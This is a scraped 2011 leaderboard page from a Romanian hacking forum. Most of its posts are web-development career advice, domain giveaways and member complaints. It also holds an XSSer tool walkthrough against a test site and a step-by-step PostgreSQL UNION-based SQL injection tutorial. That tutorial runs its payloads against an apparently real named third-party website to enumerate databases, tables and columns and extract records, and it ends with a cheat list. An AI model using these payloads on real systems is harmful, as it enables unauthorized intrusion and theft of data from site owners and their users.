Leaderboard
Popular Content
Showing content with the highest reputation on 06/13/11 in all areas
-
Orice extensie, in afara de tld-uri specifice tarilor. Primii 5> 600 posturi primesc. (nu vreau sa vad pute mici cu 10 posturi).2 points
-
pe parte de programare web, sunt mai multe tipuri de joburi si o sa le iau pe rand 1) web designerul - trebuie sa cunoasca foarte bine design-ul (o scoala de arte e recomandat, ai avantaj la angajare) - trebuie sa cunoasca foarte bine un program de grafica vectoriala (gen corel) si photoshopul (sau alternativele de pe mac). Tin sa precizez ca firmele mari de media si publicitate nu fac design doar pentru web ci si pentru offline (tv si print) si de aceea designerul trebuie sa stie programul vectorial la fel de bine ca photoshopul. - sa stie care sunt diferentele de culoare dintre pc si mac (cele 255 culori comune) - sa stie sa foloseasca un program de grafica 3d (optional) - sa stie sa taie un layout pentru web/print - sa cunoasca destul de bine css (in special css3 care e din ce in ce mai cerut) - sa cunoasca destul de bine sintaxa html4/5 si xhtml (sa stie care sunt diferentele si cand i se cere sa stie sa faca cu doctype-ul specificat) - optional sa stie si ceva javascript (pentru animatii) sau flash 2) web programming client side el de obicei primeste layoutul/template-ul de la designer si daca nu e taiat se apuca sa il taie el deci trebuie sa stie - html4/5 si xhtml si xml (preferabil si wap) - css - javascript/jquery - optional ajax/php - pe langa astea ar trebui sa cunoasca structura interna la diferite cms-uri de pe piata ca sa poata implementa layoutul/template-ul pe acel cms (wordpress, drupal, joomla, phpbb etc) 3) server side programming - aici pe langa cele de la punctul 2 ar ma itrebui sa stie si php sau asp sau rubi sau alte limbaje server side - sa cunoasca cel putin o sintaxa SQL (mysql, sqlite, mssql, oracle, postgree etc) - javascript/jquery/mototools/ajax - sa aiba notiuni de matematica - sa aiba notiuni de algoritmica - sa aiba notiuni de design patterns (sistemul mvc e cel mai folosit si il poate aplica in orice limbaj de programare) - sa cunoasca cel putin un framework (cachephp, codeigniter, zend etc) - sa cunoasca un sistem de template engine (cel mai folosit e smarty) - sa fie o persoana logica si analitica (fara astea nu vei fi niciodata un bun programator) - sa aiba notiuni de securitate (fara asta nu va scrie niciodata un cod sigur) - sa aiba notiuni despre sistem (cum functioneaza tot sistemul de la client la server si intern la server ce se intampla cu datele de la interpretare pana la afisarea lor) fara asta nu va putea niciodata scrie un cod optimizat - optional sa stie java sau .net (pentru a putea face aplicatii gen jocuri online sau antivirusi online sau alte chestii cerute de firma) care ruleaza in apleturi java sau activex 4) database designer - pentru postul asta e necesar sa fi expert in baze de date, sa stii cum sa faci cele mai optime interogari si sa construiesti o baza de date care chiar si la miliarde de interogari sa functioneze optim si rapid - ar fi bine sa cunosti baze de date de tip oracle, mssql, mysql si sa stii sa faci legaturile intre tabele, sa creezi functii sql in functie de situatiile cerute si sa intelegi structura interna a unei baze de date si cum se fac legaturile intre tabele si date (lasa inner join, foreiwen keys si alte chestii similare, astea sunt mici copil pe langa ce trebuie sa stii) - ar fi bine sa stii si cum e tehnologia cloud si cum se comporta o baza de date distribuita (in cloud) 5) software project mananger - pe langa toate cele de mai sus, project managerul trebuie sa aiba cunostinte despre analiza pietei, - sa stie sa faca specificatiile unui proiect in urma discutiei cu clientii (care clienti habar nu au ce vor de obicei), - sa stie cum sa aloce parti din proiect echipei in asa fel incat sa nu existe timpi morti sau intarzieri, - sa fie un bun psiholog si orator (fara asta nu poate comunica prea bine cu clientii si cu echipa, nu se poate face inteles) - sa poata estima corect riscurile unui proiect (se fac contracte pe termen fix si pe bani multi si in caz ca nu isi cunoaste echipa sau nu a estimat bine proiectul scoate bani din buzunar ca sa plateasca daunele) - sa poata estima corect preturile proiectului (de la analiza, specificatii, implementare, testare pana la livrare si intretinere) - sa poata intervenii rapid si sigur in cazul unor conflicte (cand lucrezi pe svn si ai probleme chemi project managerul sa descalcesca ce e acolo ca doar el stie ce a facut fiecare din echipa si care linie de cod e ok si care nu) putem discuta pe rand fiecare parte de aici doar sa ma intrebati (si sa stiu sa raspund)2 points
-
^ ^ Era un articol in Phrack in care un individ zicea "If you are seeing the light at the end of the tunnel, you're probably looking in the wrong way". Si oricum, chestia cu programatorul perfect era o metafora1 point
-
PM cu numele de domenii: p3tru si Maverick. (adi a fost refuzat) Virusz: done! te astept pe PM cu nameserverele. cand mai ai nevoie sa le schimbi, la fel PM.1 point
-
Author: Punter About XSSer Tool XSSer http://xsser.sourceforge.net/ is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections in any website. In this introductory article I will show you how easy to use the XSSer for Detection and Exploitation of XSS in a vulnerable website. In action with XSSer Here we will experiment this tool on following test vulnerable website, acuforum forums Below are simple steps on using XSSer. root@punter:/pentest/web# $ svn co https://xsser.svn.sourceforge.net/svnroot/xsser xsser root@punter:/pentest/web# cd xsser root@punter:/pentest/web/xsser# python XSSer.py -u 'http://testasp.vulnweb.com' -g 'Search.asp?tfSearch=' -proxy 'http://127.0.0.1:8118? -referer '666.666.666.666? -user-agent 'correct audit' -Fuzz -s XSSer Action Screenshots After you execute above sequence of commands you can see the results as shown in the sequence of screenshots below. Screenshot 1: Testing the vulnerable website for XSS Injections using XSSer Screenshot 2: Testing the vulnerable website for XSS Injections using XSSer [Continued] Screenshot 3: Final results of XSS Detection operation. You can see that XSSer has already found couple of XSS flaws in our test website. Exploitation of XSS Injections In the above screenshot, the text marked in blue indicates attack vector which can trigger XSS Injections on this website. Now we can go ahead and manually verfy these injections and it does not take long. Below is the screenshot showing successful exploitation of detected XSS Injection. Conclusion This article shows how easy to use XSSer tool to detect those hidden XSS flaws in any website using very simple steps. You can rest your brain for the time being while XSSer does all the job for you. Download XSSer: http://xsser.sourceforge.net/ ><1 point
-
S-au strans toti onanistii si copii pe RST. Ar trebui sa vedeti inainte ce e ala respect si daca tot va bateti multi cu pumnul in piept ca sunteti hackeri sau membri ai unei comunitati de hacking, ar trebui sa vedeti ce inseamna mai exact termenul asta si sa incercati sa va comportati asa cum trebuie. Daca cineva crede ca a fi hacker inseamna doar sa dai cu click-ul in haviji si sa crezi ca linux se rezuma la putty, e grav. Pentru a fi hacker ai nevoie de principii si armonie spirituala, nu sa stai pe un forum sa injuri ca un labar si sa faci misto-uri de doi lei. Cati de aici fac ceva constructiv si ajuta comunitatea ? Cati din noi au macar un site de tutoriale prin care sa impartasasca experienta cu alti utilizatori interesati ? Eu as sterge 90% din utilizatorii acestui forum si nu as accepta pe cineva in comunitate doar pentru ca a completat un forumular de inregistrare. Pentru moderatori/admini: Ar mai trebui facuta curatenie si schimbat "TOS".1 point
-
1 point
-
Nu-l mai am in calc. In principal se prelua ETS-ul, userul si IP-ul prin GET si se stocau intr-un fisier .txt din acelasi director.1 point
-
Asta vrea sa manance de pe urmele noastre,ar trebui inchis topicul and trashed cat mai rapid.-1 points
-
Short Introduction For PostgreSQL. PostgreSQL, often simply Postgres, is an object-relational database management system (ORDBMS). It is released under an MIT-style license and is thus free and open source software . Version 7.x to 9.0 is latest. Note: before I proceed further I would like to tell my reader (begnners) Injection does not mean that Back end DB is vuln , that's cause by bad code of web developer and does not validate the input . Step-1: Getting Start with Union Based: Every db uses same principle to pull data out of db ofcourse it is select using apropriate column names. Im not goin to explain about select cause every1 know about it . Step-2: Checking Target For Vunl . http://www.crookedtree.org/index.php?catid=583' an error has occured with the database!SELECT * FROM bus_category WHERE id = 583\' Errors MYSQL with MYSQL or MS SQL with SQL or ORACLE with ORA or MS ACCESS with Jet and Warning: pg_exec () [function.pg-exec] <== PostgreSQL OR error like above. Step-3: Getting Number Of Columns For Getting columns we use same method used in other db order by we use -- or # for comments . http://www.crookedtree.org/index.php?catid=583 order by 1-- <== no error http://www.crookedtree.org/index.php?catid=583 order by 2-- <== no error http://www.crookedtree.org/index.php?catid=583 order by 3-- <== no error http://www.crookedtree.org/index.php?catid=583 order by 4-- <== no error We will do increament of 1 till get an error and we have error on 14th column. That mean we have 13th columns (error_column_num - 1) = 13th . An other Method is executing query with union and get to the column I.E http://www.crookedtree.org/index.php?catid=-583 union select null-- <== error http://www.crookedtree.org/index.php?catid=-583 union select null,null-- <== error http://www.crookedtree.org/index.php?catid=-583 union select null,null,null-- <== error We will keep adding null till we get a blank page or site loaded . This method is really anoying Big Grin . Step-4: Getting Data for the visble Column. The term most of the ppl use is vuln column . Same like Oracle injection we will use Null data type for columns. Question is why????? Because we does not know about the datatype so using null datatype will do the trick for us. and ofcourse some site does have interger value so it will be use as vise versa. http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,null,null,null,null,null, null,null,null,null,null-- Now can see page loaded with out error (some time loaded but content missing as in this site) . Now what but can not see any coulmn print on screen . Lets procceed with interger value but 0 . http://www.crookedtree.org/index.php?catid=-583 UNION SELECT 0,null,null,null,null,null,null,null,null,null,null,null,null-- <== no error http://www.crookedtree.org/index.php?catid=-583 UNION SELECT 0,0,null,null,null,null,null,null,null,null,null,null,null-- <== no error http://www.crookedtree.org/index.php?catid=-583 UNION SELECT 0,0,0,null,null,null,null,null,null,null,null,null,null-- <== error http://www.crookedtree.org/index.php?catid=-583 UNION SELECT 0,0,null,0,null,null,null,null,null,null,null,null,null-- <== error Will keep replacing null with interget value "0" untill get an error . Wow we have an error on 3rd and 4th columns, there are other columns well but we stop here and move to next step. This what we are looking for . Step-5: Getting DB Version Now our query will be same as with null except 4th column , will replace it with version . http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,version(),null,null,null,null,null,null,null,null,null-- PostgreSQL 8.2.9 on x86_64-pc-linux-gnu, compiled by GCC cc (GCC) 4.1.2 (Ubuntu 4.1.2-0ubuntu4) Now have got the db version Big Grin . Step-6: Getting Other DBz and Table Schema Im goin to check if this target having other db or not http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,datname,null,null,null,null,null,null,null,null,null FROM pg_database-- AAA <== db we only see one database at a time, Now what to do hmmm how about using limit to get others Big Grin . http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,datname,null,null,null,null,null,null,null,null,null FROM pg_database LIMIT 1 OFFSET 1-- LIMIT 1 OFFSET 1 <== OFFSET value. If we keep changing this value then we will get next db Big Grin like 1 2 3.... . I will explain this how to use other db for injection in an other tutz . Now we will move to our injection. Step-6.1: Now Getting Table Schema. http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,table_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.TABLES-- addbook Bad thing is cant concat hehehe aah so what to do now . We will have to use limit . Ive already explain how to use it . http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,table_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.TABLES limit 1 offset 3-- artist_entry OR Table From Current DB Schema http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,table_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.TABLES where table_schema=current_schema() limit 1 offset 0-- addbook Just keep increasing the value and you will see next table . Step-7: Getting Columns Of Schema Now lets proceed with column enumeration. http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,column_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.columns abbrev Getting columns for schema , again same one at a time , we will use limit here. http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,column_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.columns limit 1 offset 1-- access_date Step-7.1 Getting Columns for Particular Table for Current DB Schema http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,column_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.columns where table_name=addbook-- What is wrong with this query ??? aah an error Big Grin . Remember mysql why we have to convert table name into char Im not goin to exlaining it here . But here senerio is little different for concat char we will use " || " pipe sign . We are using table name "addbook" We will convert our table name with oracle char , using hackbar addon . select table name and SQL--->ORACLE--->ORACLE CHAR() . http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null, column_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.columns where table_name= CHR(97) || CHR(100) || CHR(100) || CHR(98) || CHR(111) || CHR(111) || CHR(107)-- add1 Again to get other columns we will have to use limit Big Grin . http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,column_name,null,null,null,null,null,null,null,null,null FROM INFORMATION_SCHEMA.columns where table_name= CHR(97) || CHR(100) || CHR(100) || CHR(98) || CHR(111) || CHR(111) || CHR(107) limit 1 offset 3-- city Step-8: Getting Data From Coulmn http://www.crookedtree.org/index.php?catid=-583 UNION SELECT null,null,null,city,null,null,null,null,null,null,null,null,null from addbook limit 1 offset 1-- Alanson Thats All folks Smile . Hope you have enjoyed it Smile . Post your valuable comments . Quick Cheat List: current_database() current_schema() current_user inet_client_addr() inet_client_port() inet_server_addr() inet_server_port() pg_my_temp_schema() pg_postmaster_start_time() session_user user version() getpgusername() Special Thanks to : N3T.CrAck3R , Sho0ter , Renorobert, NetSpy-1 points
-
Mesaje gratis pentru bautorii competenti de palinca sau bauturi mai tari. PM me pentru parola. http://five.eu5.org/showergel/ Nu dati parola la copii!-1 points